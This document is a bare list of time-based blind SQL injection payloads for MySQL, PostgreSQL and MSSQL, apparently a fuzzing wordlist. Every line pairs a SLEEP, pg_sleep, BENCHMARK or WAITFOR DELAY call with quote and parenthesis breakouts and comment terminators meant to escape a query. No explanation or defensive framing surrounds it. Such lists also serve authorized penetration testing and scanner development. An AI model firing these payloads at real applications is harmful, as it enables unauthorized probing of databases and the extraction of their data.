&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)&&'1
&&SLEEP(5)--
) or benchmark(10000000,MD5(1))#
) or pg_sleep(5)--
) or sleep(5)="
) or sleep(5)='
)) or benchmark(10000000,MD5(1))#
)) or pg_sleep(5)--
)) or sleep(5)="
)) or sleep(5)='
));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
+ SLEEP(10) + '
+benchmark(3200,SHA1(1))+'
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or sleep(5)#
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or sleep(5)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or sleep(5)#
;waitfor delay '0:0:5'--
AnD SLEEP(5)
AnD SLEEP(5) ANd '1
AnD SLEEP(5)#
AnD SLEEP(5)--
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
benchmark(10000000,MD5(1))#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))#
benchmark(50000000,MD5(1))--
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or benchmark(10000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))--
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
or pg_sleep(5)--
or sleep(5)#
or sleep(5)="
or sleep(5)='
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
sleep(5)#
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
